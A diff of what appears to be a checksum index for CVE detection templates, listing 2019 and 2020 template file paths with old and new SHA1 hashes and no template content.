http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd -http/cves/2019/CVE-2019-2616.yaml:6f2283969a597f2fc28123c41a23eeed8fb703d7 +http/cves/2019/CVE-2019-2616.yaml:3fe8eb3189261123c345704ad4e82e0cd5a6ecb4 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c -http/cves/2019/CVE-2019-2729.yaml:bf87afdf644054332c3852d32b4ac049bdb5a41e +http/cves/2019/CVE-2019-2729.yaml:34fe986223062b08b38a8a1da72390f96d7e35d8 http/cves/2019/CVE-2019-2767.yaml:9c9628b7dead68845570d0883068ad29cec11c69 http/cves/2019/CVE-2019-3396.yaml:24a87a48a55562a9f9284f20e9b59b12a0e52727 -http/cves/2019/CVE-2019-3398.yaml:28a532329e7e968c03dbdf7828c9b5e188d7c25f +http/cves/2019/CVE-2019-3398.yaml:359883860ff50c8282893320e98877cf4f201bf8 http/cves/2019/CVE-2019-3401.yaml:e919f1305ffa5044b5eac5e37d80178d8413aadf http/cves/2019/CVE-2019-3402.yaml:e875780f5316e2e685f55c79921cdcb90390396b -http/cves/2019/CVE-2019-3403.yaml:c7ee2f41bf43a7f9e58b58c6192d95b49f4dce1e -http/cves/2019/CVE-2019-3799.yaml:2040259742f87b2b202e0a00a32265820907d9ac -http/cves/2019/CVE-2019-3911.yaml:b70ddf7c2fc0b63f631bf59d603adc146565d1a6 -http/cves/2019/CVE-2019-3912.yaml:e5abef4495c21de0530d4b1f505004e099179d91 -http/cves/2019/CVE-2019-3929.yaml:1679f1f793d2ae98c8058c79570192a7775f09c6 -http/cves/2019/CVE-2019-5127.yaml:210a6682dca2a49c33269f9300db8cc29ef22f23 -http/cves/2019/CVE-2019-5418.yaml:08f3932cedc43cea226cdcd3e888717e32742b85 -http/cves/2019/CVE-2019-5434.yaml:a32a07229cfe54517484b78bdec6278cabf61620 -http/cves/2019/CVE-2019-6112.yaml:557fb23d574caeb2ff83513bafcf0ddd776a0ac1 -http/cves/2019/CVE-2019-6340.yaml:c0e85bf4c7d5a44b6a2288baf33daa21966dc5c3 -http/cves/2019/CVE-2019-6715.yaml:3e335ffc1bb0e3d32a7755cbeb02535407298af7 -http/cves/2019/CVE-2019-6799.yaml:86e0107a33657c4a446eae5ee6544633801be073 -http/cves/2019/CVE-2019-6802.yaml:04678947a8f58198df25d0b489029618cca2caff +http/cves/2019/CVE-2019-3403.yaml:cb860e2d12ba9f84068252624d4fa9c20a25ea55 +http/cves/2019/CVE-2019-3799.yaml:7ca01e8bc838b8f14b8ff2c3a7856d8ab4aa6db7 +http/cves/2019/CVE-2019-3911.yaml:60bad0968b361ad7400cbf147b011d9bd62f48a9 +http/cves/2019/CVE-2019-3912.yaml:fd327d636ba1fe5c3fdd1d923b23f4a3aa4b7842 +http/cves/2019/CVE-2019-3929.yaml:2a461f92bd310f46ab1c2cc3d4da0f237134675c +http/cves/2019/CVE-2019-5127.yaml:a8573a60af8fc2961f11b134e4b18dfb1e5643b6 +http/cves/2019/CVE-2019-5418.yaml:45c69bfdef5871a86b8ae2af518cbfaba298464c +http/cves/2019/CVE-2019-5434.yaml:ed7547e7f4361fb86514077654e2f3a0b8f1e9f4 +http/cves/2019/CVE-2019-6112.yaml:f7ddfaa256066a26aaedb8da74037292814708a5 +http/cves/2019/CVE-2019-6340.yaml:c5c4688ced3332dbb8ed7d9ce2ce28c67527c15d +http/cves/2019/CVE-2019-6715.yaml:cf0c3c5bb1820844c1046ee082bcf9f94675da40 +http/cves/2019/CVE-2019-6799.yaml:f6c533ec6b153c1c5da9f42082b8497c8d9138dd +http/cves/2019/CVE-2019-6802.yaml:df7d1b0093b3e31a4b7a40b4bfcbc06ddac09672 http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 -http/cves/2019/CVE-2019-7192.yaml:40ab1445f19dcd09322617d418a9612eea02bac9 -http/cves/2019/CVE-2019-7219.yaml:6372986a8f04b8ace9c02f4973e0ee15ee51e08a -http/cves/2019/CVE-2019-7238.yaml:78115715b771474b691df0757ad350bd6dac77ca -http/cves/2019/CVE-2019-7254.yaml:fdc4ef2bf92b39668323124ef3a8f6baf371ea49 -http/cves/2019/CVE-2019-7255.yaml:fa259ac01c24c4d63bd06eec2175c3684258bb7b -http/cves/2019/CVE-2019-7256.yaml:5d6806e42a477175b41658e4caa26220448c073d +http/cves/2019/CVE-2019-7192.yaml:a3c022f3f5f609a34f4fff7c8584b27bbe280088 +http/cves/2019/CVE-2019-7219.yaml:22b58ee1a923ac844ea0def093b470e6271be400 +http/cves/2019/CVE-2019-7238.yaml:95354fb6a82023096eb5605d4c31f822955e5898 +http/cves/2019/CVE-2019-7254.yaml:58d2705cf5a3522943dc404d0605c0344f6e0ceb +http/cves/2019/CVE-2019-7255.yaml:15cd8a68db1d99991d667d66a6bc422d3e6aeca0 +http/cves/2019/CVE-2019-7256.yaml:3ac6d980c716565de1ef79f4d9bb3b4a9e387740 http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 -http/cves/2019/CVE-2019-7315.yaml:2faa6e33a847eb3abff47be02c311cb501934551 +http/cves/2019/CVE-2019-7315.yaml:563d393bc73e5b333d833a2246ea88618f7dc974 http/cves/2019/CVE-2019-7481.yaml:7e3ebd3190512ff8d2949cb3522a11884b3e75c4 http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a -http/cves/2019/CVE-2019-7609.yaml:9ac40649279f57ec29045a4a4ed3d48de3108eca -http/cves/2019/CVE-2019-8086.yaml:a33819614a6765bed584cff72b80ef7835ae71ed -http/cves/2019/CVE-2019-8390.yaml:3567fb9136558b8770d32f19bce1c17fbaf59177 -http/cves/2019/CVE-2019-8442.yaml:e59231257dea5b8c2b88eb8614bc115bd7230e2b -http/cves/2019/CVE-2019-8446.yaml:48b979313d1dd7be1971319f2506bf2b7eb716cc -http/cves/2019/CVE-2019-8449.yaml:e8c00f80088fdb8cacdd891ac50189d87a1bccc1 +http/cves/2019/CVE-2019-7609.yaml:6e6f132b4bfff1ae086c14c0e841c0f0d85b119e +http/cves/2019/CVE-2019-8086.yaml:52e596338a09e62826e3ee5b50068eb2775a858b +http/cves/2019/CVE-2019-8390.yaml:d3553e9ed80efd29280fae1a715cbcffc9530e09 +http/cves/2019/CVE-2019-8442.yaml:04a79ea9dfd14ec3a51f817ba469eefec9d6e506 +http/cves/2019/CVE-2019-8446.yaml:8c8d7da037e6deaaaba5ed387258e7bfa4fd6bbc +http/cves/2019/CVE-2019-8449.yaml:28d6468489990a531504fe946cd565726f84b734 http/cves/2019/CVE-2019-8451.yaml:814f3f055c890bf9f2018767b4db70a623fb351c http/cves/2019/CVE-2019-8903.yaml:187c434537693e85a8ff134a9c6ce0fd2912ebae -http/cves/2019/CVE-2019-8937.yaml:4e8bcc84d031de09ec8d9507f690ffaa4688fc90 -http/cves/2019/CVE-2019-8982.yaml:d9fecf28d730686c248d1a6d058f996e75fcf581 +http/cves/2019/CVE-2019-8937.yaml:9b9106c252c15d8df2fa8ebd0ae0f1ab36cb4bfb +http/cves/2019/CVE-2019-8982.yaml:e0d303e9104eb25c01b2f53d8bdef398a464cc40 http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c -http/cves/2019/CVE-2019-9618.yaml:7cd954481089220762074c96c5566d526a8e80e3 -http/cves/2019/CVE-2019-9632.yaml:33deb78b99ecc45949bc24de99485737903cf529 -http/cves/2019/CVE-2019-9670.yaml:a18440d50b9c44964110bd79367f44832d12b988 -http/cves/2019/CVE-2019-9726.yaml:2348d4154251c1d2aaf64b87a7f71aab89c05c5a -http/cves/2019/CVE-2019-9733.yaml:88c5ee149161dd7d261adf0a9213f697cc3396aa -http/cves/2019/CVE-2019-9915.yaml:5db8bc556847061de2e80b840ac8db3108b3a4da -http/cves/2019/CVE-2019-9922.yaml:330d1e80bceec49e71791b2fabe801787f16d3ff +http/cves/2019/CVE-2019-9618.yaml:bd20454a1919dd4b65ae2ff8c539ef0781605acf +http/cves/2019/CVE-2019-9632.yaml:a9b4273d963d3b99382bc05bb819a3f47bfa2b81 +http/cves/2019/CVE-2019-9670.yaml:8750d6eed79a4854dddbf7228f6e33488588d8d6 +http/cves/2019/CVE-2019-9726.yaml:22711bb0aaac4abb940352d002f34f101c1c831c +http/cves/2019/CVE-2019-9733.yaml:f98e32bd5d2c400b944115b429bb58a84f0cded3 +http/cves/2019/CVE-2019-9915.yaml:eb20be2c46939b6b57b4463f42bab1429f6a16b8 +http/cves/2019/CVE-2019-9922.yaml:f208a9a411ee06862f265c7a021195694b9806a6 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:888dc6e81557675a2255e20d09d22c709863eede -http/cves/2020/CVE-2020-0618.yaml:c968e9dba735587f8cc98af60b2eb7af8c0dc18b +http/cves/2020/CVE-2020-0618.yaml:800965770c9aea20da669fe5083b4c0b2cb34461 http/cves/2020/CVE-2020-10148.yaml:bbb610b4e3403659c5f171819c0cace86262e009 -http/cves/2020/CVE-2020-10199.yaml:8f8827358cd1e51bdb2861c8be2f1acebfcdb3aa -http/cves/2020/CVE-2020-10220.yaml:67cd9de8eacd275c51360349e2dd8cf898733ff0 -http/cves/2020/CVE-2020-10546.yaml:ebb8f9d0186d72183551b7aa6346473ee4d80657 -http/cves/2020/CVE-2020-10547.yaml:3bd5b77cca4947473cd02b1d6b77a0d40bfdffcf -http/cves/2020/CVE-2020-10548.yaml:353e36f76e0e709c11285639e3d57be7c8e16a95 -http/cves/2020/CVE-2020-10549.yaml:1ce7fe816e4ed625dfef9722345fa4fffeb2e3ab -http/cves/2020/CVE-2020-10770.yaml:af7cc36095daffdb10505260f0a2866093e7f693 -http/cves/2020/CVE-2020-10973.yaml:24cf45621ff52a6f3e9d59d2fe264bd14deccbe8 -http/cves/2020/CVE-2020-11034.yaml:6c926829b0891f2046ec9e38a1795a29555693c6 -http/cves/2020/CVE-2020-11110.yaml:91bc83c50f26b96ad6025d57beb66f620223245e -http/cves/2020/CVE-2020-11450.yaml:a224335a601dff929ebb675ef1ee92fb1c504c4e +http/cves/2020/CVE-2020-10199.yaml:77d72c4b9762cd1ca9e0e2b0dbafd457d6e89583 +http/cves/2020/CVE-2020-10220.yaml:4778e319ea29668de75ddd08d835c101dca6ce91 +http/cves/2020/CVE-2020-10546.yaml:f4cfaba39bd36ea06f7ad20f779c8b892b327f95 +http/cves/2020/CVE-2020-10547.yaml:fccf2c60ed0d31406920c7f1c696c8e7e4f8a9f2 +http/cves/2020/CVE-2020-10548.yaml:c729f31eda87929ce0ef96b5c4bd29d439828b95 +http/cves/2020/CVE-2020-10549.yaml:8d62ce9548305a000a29ee4de7cab6deb2b057f3 +http/cves/2020/CVE-2020-10770.yaml:e91c721865dd2ff31cecf4aa60d6b51bd9561a4b +http/cves/2020/CVE-2020-10973.yaml:201cab00b4e2ace6f44b87582e5837359bb6731b +http/cves/2020/CVE-2020-11034.yaml:e3c027ab23fdced89e9e73cf36bcf8d1cc3390a0 +http/cves/2020/CVE-2020-11110.yaml:44cb6133ad238cbe045ef5abc513fb02b16fb78f +http/cves/2020/CVE-2020-11450.yaml:8756a2949a6c8fb8745f7349dc63d5eae6e07774 http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 -http/cves/2020/CVE-2020-11530.yaml:e4de2a4e8e617c78ba87fa185790a0495bf0e8da -http/cves/2020/CVE-2020-11546.yaml:0028a1adf59ba8524634f55e24652564fc5ce6b5 -http/cves/2020/CVE-2020-11547.yaml:494f8cc8b785fabe3ff98877a3174451aebc6daf -http/cves/2020/CVE-2020-11710.yaml:c2bde61a09512b2cc4c86a2d7bdaa5e85172896e -http/cves/2020/CVE-2020-11738.yaml:4c2e75351d44e91b76d713e865d22f88200e3567 -http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e -http/cves/2020/CVE-2020-11853.yaml:c5d11eb79e634cb7a91088fe76160f639712d927 -http/cves/2020/CVE-2020-11854.yaml:83b8968272ec2cd44a13434ee02a7d4a16128622 -http/cves/2020/CVE-2020-11930.yaml:4d997b58dee0b035f39ea9d3589c7a141cab7e42 -http/cves/2020/CVE-2020-11978.yaml:447d6b42a9d09489934f3c2389db422764017885 -http/cves/2020/CVE-2020-11991.yaml:3314b276c640c526eb12fcc56a4512066647df6c -http/cves/2020/CVE-2020-12054.yaml:0e9a43f56fe26a1d1a99d6100ebca7dc136b9cf6 -http/cves/2020/CVE-2020-12116.yaml:abb9cf66f2277f40b0946dbb7832c9260bb3bc15 -http/cves/2020/CVE-2020-12124.yaml:3638eeb2b36393ae2aba45461d293f2a1e2e75f5 -http/cves/2020/CVE-2020-12127.yaml:87c917e2c6ff2d5a6897a228c875b2f3a64b618b -http/cves/2020/CVE-2020-12256.yaml:b523d1dd854fac23adf5c34ee579f295b7b6d609 -http/cves/2020/CVE-2020-12259.yaml:484f27b534aafadde6a65e5e178d015194bf0345 +http/cves/2020/CVE-2020-11530.yaml:c8b08da8627b2000000190853448b23f342fbc57 +http/cves/2020/CVE-2020-11546.yaml:d36c933c917a36874cbe0bea23837423a0d0f984 +http/cves/2020/CVE-2020-11547.yaml:0438a800f5346bc94895d8d3ca876529e7e5b752 +http/cves/2020/CVE-2020-11710.yaml:a8eebe94fca4681df48465ce78931cfb6a15da9e +http/cves/2020/CVE-2020-11738.yaml:38359263c5d1dd96d14cb4e5c55af4abfc62fa51 +http/cves/2020/CVE-2020-11798.yaml:4fac247c7e85074886b2222c70d627c7956f52fb +http/cves/2020/CVE-2020-11853.yaml:e9d6c43bb2ec253628b47ead334f90ec94c898aa +http/cves/2020/CVE-2020-11854.yaml:3aefc5b8da8bc0ab3112afec13a9d1461a928de1 +http/cves/2020/CVE-2020-11930.yaml:14ed550a2b4ebc2783eb0b9095e0ca792528315c +http/cves/2020/CVE-2020-11978.yaml:511466908b771f79db4fff1bbba8ca24f6c3d704 +http/cves/2020/CVE-2020-11991.yaml:222fe8cf6c5c7a92134acf23ce2562ff01105ad2 +http/cves/2020/CVE-2020-12054.yaml:f12b823b465f98af2f1aec6deed88b59fc412bfd +http/cves/2020/CVE-2020-12116.yaml:21d8e5468b29dfb8d2cfdb1c172f5f34c2232d2c +http/cves/2020/CVE-2020-12124.yaml:70eed1ed97b7fdc2924b9fdefc780f1b363fff97 +http/cves/2020/CVE-2020-12127.yaml:c6001a6c3877da5a3ae09e444a0b127e366637ba +http/cves/2020/CVE-2020-12256.yaml:f34659b59eaa2e1c504e59820b83c7563c536061 +http/cves/2020/CVE-2020-12259.yaml:73dda606f0fdc6c667fe8b2c22c27752240b2392 http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 -http/cves/2020/CVE-2020-12478.yaml:b3446ea4995c16bde11634d1be9d27c2adc81b95 -http/cves/2020/CVE-2020-12720.yaml:702c0295e7f153296fea255008e922f95972b2c0 +http/cves/2020/CVE-2020-12478.yaml:87e72cdc38005613a2284767f0a0225dc4cca51a +http/cves/2020/CVE-2020-12720.yaml:7b1db34fec447254d14245023e8a6c62d603d5e1 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c -http/cves/2020/CVE-2020-13117.yaml:cf62563241ec58e319526c7cfcb36024e0ebbc44 -http/cves/2020/CVE-2020-13121.yaml:99e7149cef2ad1fbd47968099d2a83c0dc5f34df -http/cves/2020/CVE-2020-13158.yaml:01e90f7ef7945888ed0d18b2ed8dc9e222368879 -http/cves/2020/CVE-2020-13167.yaml:a99164b1f9e3321e13350533e700a641d4e14259 -http/cves/2020/CVE-2020-13258.yaml:b03f343371c7692bacbedd6e57803f077afe476e -http/cves/2020/CVE-2020-13379.yaml:af45b163a4c2e7c0b5dbc134667fbd1a05db9dfa -http/cves/2020/CVE-2020-13405.yaml:9fe62ed9413d58431e59fc951eede4197d4b7c33 -http/cves/2020/CVE-2020-13483.yaml:1611461e374d48e65f3afc56a8639fcbe49913cb -http/cves/2020/CVE-2020-13638.yaml:da0ccacc9c3922fb79a1fdffaca52d96ce67b39e +http/cves/2020/CVE-2020-13117.yaml:20ee55cb74559402ad4b5e5570ba452ea96d7dec +http/cves/2020/CVE-2020-13121.yaml:4e31f4f3965162eec18f0f5458571a6ef4e17c70 +http/cves/2020/CVE-2020-13158.yaml:8eaf68c6e18b2f37e3020a1373b4da7a0e43b36b +http/cves/2020/CVE-2020-13167.yaml:0bcb46d26cc1d9722db0635eee7b834b101f4f60 +http/cves/2020/CVE-2020-13258.yaml:e65163f41e4d4f35947ca9a75d56fc81fc33c672 +http/cves/2020/CVE-2020-13379.yaml:de18bb72cb84abdaf69c7ae1920c351d916f8978 +http/cves/2020/CVE-2020-13405.yaml:2fbea436dc186fe32b0d2238dd9727fe8114df9d +http/cves/2020/CVE-2020-13483.yaml:d032793a83c1391bdd6c380c0b9884e0546ddc58 +http/cves/2020/CVE-2020-13638.yaml:be73c7ba116e9ffec0963f335231be77e1c17bd0 http/cves/2020/CVE-2020-13700.yaml:33340a13d53c725023e61b3a6a08233a924c9584 -http/cves/2020/CVE-2020-13820.yaml:0f2d75fbe4dae33b055497874ad4b880136f03a7 -http/cves/2020/CVE-2020-13851.yaml:cae2a64c5d324f250e6a02f2e873a593fccf10ea -http/cves/2020/CVE-2020-13927.yaml:88ded4785d9bc515bbf4671246d79e2b52112129 -http/cves/2020/CVE-2020-13937.yaml:87cf74d00dd5bfd3afb56d868ebe3462f81d0931 +http/cves/2020/CVE-2020-13820.yaml:f086d3a425e3df203ee9494f60298903e18b8908 +http/cves/2020/CVE-2020-13851.yaml:1c69b7e31eae6d20b1256497c1e1c54b258e25ea +http/cves/2020/CVE-2020-13927.yaml:95f52804c9dbb6945f9f695890e1463749e6dc84 +http/cves/2020/CVE-2020-13937.yaml:b900a130f56309cb0078d02a0d75ccfe5b748194 http/cves/2020/CVE-2020-13942.yaml:0b3b785fa8404e80153dc4a82d8a016e432b4d4e -http/cves/2020/CVE-2020-13945.yaml:e571bd66bcf7ff4f313e3ec024c4831942788262 +http/cves/2020/CVE-2020-13945.yaml:00ce29da8821ba109bf480c70d67d6dcfc8faa5b http/cves/2020/CVE-2020-14092.yaml:75a0892c9809a6c1abd7e4cc3d799a44cb88399d -http/cves/2020/CVE-2020-14144.yaml:232339f4f5191691b8b16580391a49717e779d5b -http/cves/2020/CVE-2020-14179.yaml:4e93a22716357304e957bfa02e356119aa97f1e6 -http/cves/2020/CVE-2020-14181.yaml:5aac59f062cea4a6193264b96db2e82763636741 -http/cves/2020/CVE-2020-14408.yaml:6b2bcebab60d604df03b9f427ed6fa995f13042c -http/cves/2020/CVE-2020-14413.yaml:99aa2e3bc663710df4af68cdcd71b96cba2f32e9 -http/cves/2020/CVE-2020-14750.yaml:21a5e8dd00a261630d45d87f0f4f8855ccb6e7ef -http/cves/2020/CVE-2020-14864.yaml:4f0476bf5c9e8a7bcdd20cd16789bcad1f410c56 -http/cves/2020/CVE-2020-14882.yaml:7e7a672e31e986f4856822c0519953c8a614ce30 -http/cves/2020/CVE-2020-14883.yaml:32c20e2dd8ddfbe30b90e17f558c10beb4e61bc5 +http/cves/2020/CVE-2020-14144.yaml:de3bf41f10763111ab2ac8678715443f14755a1e +http/cves/2020/CVE-2020-14179.yaml:7c170559bfd46eb1f098ecd9433cb5962fe39d77 +http/cves/2020/CVE-2020-14181.yaml:a7670d91dac7816bc358f8c2bcb62a859b1aa8d3 +http/cves/2020/CVE-2020-14408.yaml:5ecf5a403a71a2a2ee721a0e9665bec2a4d0892d +http/cves/2020/CVE-2020-14413.yaml:1bd09b57c6c8840e671826d3d320fc072496823c +http/cves/2020/CVE-2020-14750.yaml:ef8663d1cfe855ac0400166121b550a2bb617309 +http/cves/2020/CVE-2020-14864.yaml:87bf1db7002cd028bbaceb5edc5e5388e676a2e9 +http/cves/2020/CVE-2020-14882.yaml:3aee0708f2ae7f6ee9d9d98036ef6600df3f93e1 +http/cves/2020/CVE-2020-14883.yaml:3e3d7b25a3bccd2e874fe539d1dcf5efdf13598f http/cves/2020/CVE-2020-15050.yaml:ff53982b1660dbacf0082093c19954ccd1597228 -http/cves/2020/CVE-2020-15129.yaml:3ff00f8b3d55faba5fdb1f72565ad7de3bf36279 -http/cves/2020/CVE-2020-15148.yaml:b5c6c9f741006d8b8c8e55a5c6c8cc0dbd625848 -http/cves/2020/CVE-2020-15227.yaml:eaeaae62f02a0f034a5475c01e381f0388f86adf -http/cves/2020/CVE-2020-15500.yaml:1738a4c203283a8bcb8a25e3f3cf2dc81a621b82 +http/cves/2020/CVE-2020-15129.yaml:c07785a9275455945fe8e675e5833c4ed124ec93 +http/cves/2020/CVE-2020-15148.yaml:e453aabff7dfda3a671b847d7b2648e2ab52ed3f +http/cves/2020/CVE-2020-15227.yaml:ed721a2d4c39a7b1231ca59f538153370217532e +http/cves/2020/CVE-2020-15500.yaml:b80e7228d9b90fc7824b871f8b16eb6c3ac6ec32 http/cves/2020/CVE-2020-15505.yaml:e6a491c737cc161a2f84ccf4adebee81a745337b -http/cves/2020/CVE-2020-15568.yaml:442ec79083e8b99d8b29da21c9c38dd919b309b7 -http/cves/2020/CVE-2020-15867.yaml:fe723ce37c2ba0ac50ff700f5a4ba1371a3eec43 -http/cves/2020/CVE-2020-15895.yaml:45e601b34a388c34fde98e9b4e4054e5b98eeadb +http/cves/2020/CVE-2020-15568.yaml:203c9a51e859837c893bdfb5eba736406670420f +http/cves/2020/CVE-2020-15867.yaml:25c54a61eedf2580bbf2304c6ab3c3f6ba945654 +http/cves/2020/CVE-2020-15895.yaml:2e8edcabc2258180e398d26769c2a347d21a9e09 http/cves/2020/CVE-2020-15920.yaml:b9bce590c1d6a4a2950e930ec84e5bd343fd1cf1 -http/cves/2020/CVE-2020-16139.yaml:4a8efd3ef6dd8500daf053805bb24fb9819b26a4 -http/cves/2020/CVE-2020-16846.yaml:1fd77554281c1da9cd827d1f3c29220efd0d1d35 -http/cves/2020/CVE-2020-16952.yaml:32d858972d7dd34075112ad9a2cf8b3916460c54 -http/cves/2020/CVE-2020-17362.yaml:1d3d60e49940794b9fc0c15ec254846c665defe9 -http/cves/2020/CVE-2020-17453.yaml:37d98425ae2b18c9ae19efa9af4bc64ad8ed8143 -http/cves/2020/CVE-2020-17456.yaml:0f62d8efa95a601406024e42d83c353c172a7fbf -http/cves/2020/CVE-2020-17463.yaml:0aa9fae26f8ce93664afcd7f6d15961c05035b23 -http/cves/2020/CVE-2020-17496.yaml:6592a067f97d7e21fa7b0b9fd51fc7a72bcfa347 -http/cves/2020/CVE-2020-17505.yaml:cde2f5e2251520ffcc5942e408e18fdf03c1a87e +http/cves/2020/CVE-2020-16139.yaml:47491567138b40f513976c442a929d1a1d45e20b +http/cves/2020/CVE-2020-16846.yaml:ed64b05db25e3391086736114330fca043564cf7 +http/cves/2020/CVE-2020-16952.yaml:855ef66059d537f337c286915ff3ecef82724d73 +http/cves/2020/CVE-2020-17362.yaml:12e90856b34ac06db9d68a267c83442f8b36dc97 +http/cves/2020/CVE-2020-17453.yaml:54e710d28087b56a97932478496448fc392951bc +http/cves/2020/CVE-2020-17456.yaml:e4d357ff92d873d41376c7b79a1f518893df1e45 +http/cves/2020/CVE-2020-17463.yaml:29e89de402c5bf2755d1203ec543c8a4c6d5836d +http/cves/2020/CVE-2020-17496.yaml:f2c8075b728119cade8e9670db347e016d0ed081 +http/cves/2020/CVE-2020-17505.yaml:3fc856c405b9d3ce267495bdf84d6cf8450a8698 http/cves/2020/CVE-2020-17506.yaml:2f42db756532bb7ed6eccaa22dc4196fb4e41c4a http/cves/2020/CVE-2020-17518.yaml:d81d48cbbd5df9824834f232c4c3ee0ecbe19d6f -http/cves/2020/CVE-2020-17519.yaml:4d3a9f2c5601d363354904ea52d3189359c2b795 -http/cves/2020/CVE-2020-17526.yaml:27f7c46e2774072cc274e38b793b0e90a4c69faa -http/cves/2020/CVE-2020-17530.yaml:0fa2e949d5d30f0d5736a0b8f5ddbb5cf98f31d3 -http/cves/2020/CVE-2020-18268.yaml:04551264e8c8de4c13a0a0854d0f265e180d1941 -http/cves/2020/CVE-2020-19282.yaml:68c868264d3131edc651940d64c2772f62ef88ad -http/cves/2020/CVE-2020-19283.yaml:1c37358907fcaa4b0f3d603b62c270bed40eda5c +http/cves/2020/CVE-2020-17519.yaml:28253c1983a82cee042980cfd0bef149fabf7ed6 +http/cves/2020/CVE-2020-17526.yaml:4ba2549b99a0073f587f3ac9420153e7ecedf330 +http/cves/2020/CVE-2020-17530.yaml:0824e5803fd53b497a41a4ee6a5dbfdc19eaea83 +http/cves/2020/CVE-2020-18268.yaml:cca1efded5674d028862ae277702b184c2fc5686 +http/cves/2020/CVE-2020-19282.yaml:70979b7fd446e0900faa2e234ecb470753dfd262 +http/cves/2020/CVE-2020-19283.yaml:1e5211578ecb8ecc871c90a65975e7b45d7f9758 http/cves/2020/CVE-2020-19295.yaml:60d3dd84486b18da0358042732bec6e88c6cc771 -http/cves/2020/CVE-2020-19360.yaml:7014cdc64af9bfbc5c152f9f453d47a132666ab5 -http/cves/2020/CVE-2020-1943.yaml:2282152a4f0bcb17001d0372f9951dddb0f10d7c -http/cves/2020/CVE-2020-19515.yaml:4a24ba4de43c7f167f31639ca1e46e2977915da3 -http/cves/2020/CVE-2020-1956.yaml:22b456c48aacfadf48aabad952c9f5257f87177f +http/cves/2020/CVE-2020-19360.yaml:f54f5ab5917adf0baba0eea9ffb25ae6ab7a2dbe +http/cves/2020/CVE-2020-1943.yaml:832060129d1f3c91a51f41a15d7f1943944641eb +http/cves/2020/CVE-2020-19515.yaml:c74e6d116ade83c782a813e739811e563ff39756 +http/cves/2020/CVE-2020-1956.yaml:e208ea1467b8d468e37bfcfb9911a1f965cd7572 http/cves/2020/CVE-2020-19625.yaml:c838f4924ba3563572ed00d81634424490d317b4 -http/cves/2020/CVE-2020-20285.yaml:b6c545431fb07b659b0740ca1206d86eef876eac -http/cves/2020/CVE-2020-20300.yaml:4b80ad33a19faec897d204dd956c38c3c7461c02 -http/cves/2020/CVE-2020-2036.yaml:63364cbd854896ccce675a603378645fea8e686f -http/cves/2020/CVE-2020-2096.yaml:52eb954378ae0998d3a908bf72ed67355b934311 -http/cves/2020/CVE-2020-20982.yaml:1aace0196324f38b7dcc07d2a444b7f767a33d6e +http/cves/2020/CVE-2020-20285.yaml:97c2daa0903995155b3c319d2cedeec2477bb5b8 +http/cves/2020/CVE-2020-20300.yaml:9695e60a614334c018bc667dc010c9f01ca59913 +http/cves/2020/CVE-2020-2036.yaml:2df878088d96ad05fcdee31970fc4aa430666c88 +http/cves/2020/CVE-2020-2096.yaml:604550a7f7977ee5e1980ab807019da472433fa2 +http/cves/2020/CVE-2020-20982.yaml:8bd093282b67d342b92002a85e671108b46a2608 http/cves/2020/CVE-2020-20988.yaml:639c85d1714dbddbfd9e4b8db0fbce4a5ac90b54 -http/cves/2020/CVE-2020-21012.yaml:63cdf53dc3011d2e4f17dc6ff3fe6afb66125f1c -http/cves/2020/CVE-2020-2103.yaml:c866a49b214f1cfed903c0062d10b8faa39f086c +http/cves/2020/CVE-2020-21012.yaml:eb38856f0cd1394e96a25ad58747944fc74e9d06 +http/cves/2020/CVE-2020-2103.yaml:b4b23de5027241fffef5e5c9699760de8ded2d45 http/cves/2020/CVE-2020-21224.yaml:9215850ea5836ba8924a9492ebfdd2f6a56e0ecb -http/cves/2020/CVE-2020-2140.yaml:f1b74ecc13fd2f79358b0ca1177b2434bdf4353b -http/cves/2020/CVE-2020-22208.yaml:037d6e3b5b8a6449066343119880a71dafd0d96d -http/cves/2020/CVE-2020-22209.yaml:5f24a93238d2dc488d4e2efd9067e0eb15db5e47 -http/cves/2020/CVE-2020-22210.yaml:773af5166e3b94fed49f1dbb1836c5dc1a1c733d -http/cves/2020/CVE-2020-22211.yaml:c9dc3f655c6fff920a8bfc6268c00239e03a2395 +http/cves/2020/CVE-2020-2140.yaml:a64a2b9363ac7e1dad3fe84be28242a52d49d610 +http/cves/2020/CVE-2020-22208.yaml:18bc41bafd7e5cf4fd8298da2627cce27ec09a33 +http/cves/2020/CVE-2020-22209.yaml:253697c3e817bc5f4fb695cf2e14319bfa55358b +http/cves/2020/CVE-2020-22210.yaml:7da9ba29c3ea1f1fc49d299c58d706588985ec7b +http/cves/2020/CVE-2020-22211.yaml:23709d74423456f7096fa167921c7470d6b27613 http/cves/2020/CVE-2020-22840.yaml:6c6cad1388bb2ab7192fec9a483e3a8f3edb4547 -http/cves/2020/CVE-2020-23015.yaml:8a9f361ae5312e7a9f82787f4ef31fee5071e12c -http/cves/2020/CVE-2020-23517.yaml:3fad85a5e6bc0031f20f19c68f69c17c55e99449 -http/cves/2020/CVE-2020-23575.yaml:cf0eebcabfd2a14779c5a99b202b6d7fec1cd0c1 -http/cves/2020/CVE-2020-23697.yaml:cd022bc02020a7310cff8c2ee13657da03db8ea2 +http/cves/2020/CVE-2020-23015.yaml:b3346c6e48dedf09b34f6536a4587e45ca64bce6 +http/cves/2020/CVE-2020-23517.yaml:73756be29508961bb810d8e834dbc72405a9b795 +http/cves/2020/CVE-2020-23575.yaml:34feab963e6f827c990da7425411850158b98da7 +http/cves/2020/CVE-2020-23697.yaml:66c34a7b7282b992e375c0744730d026682142fa 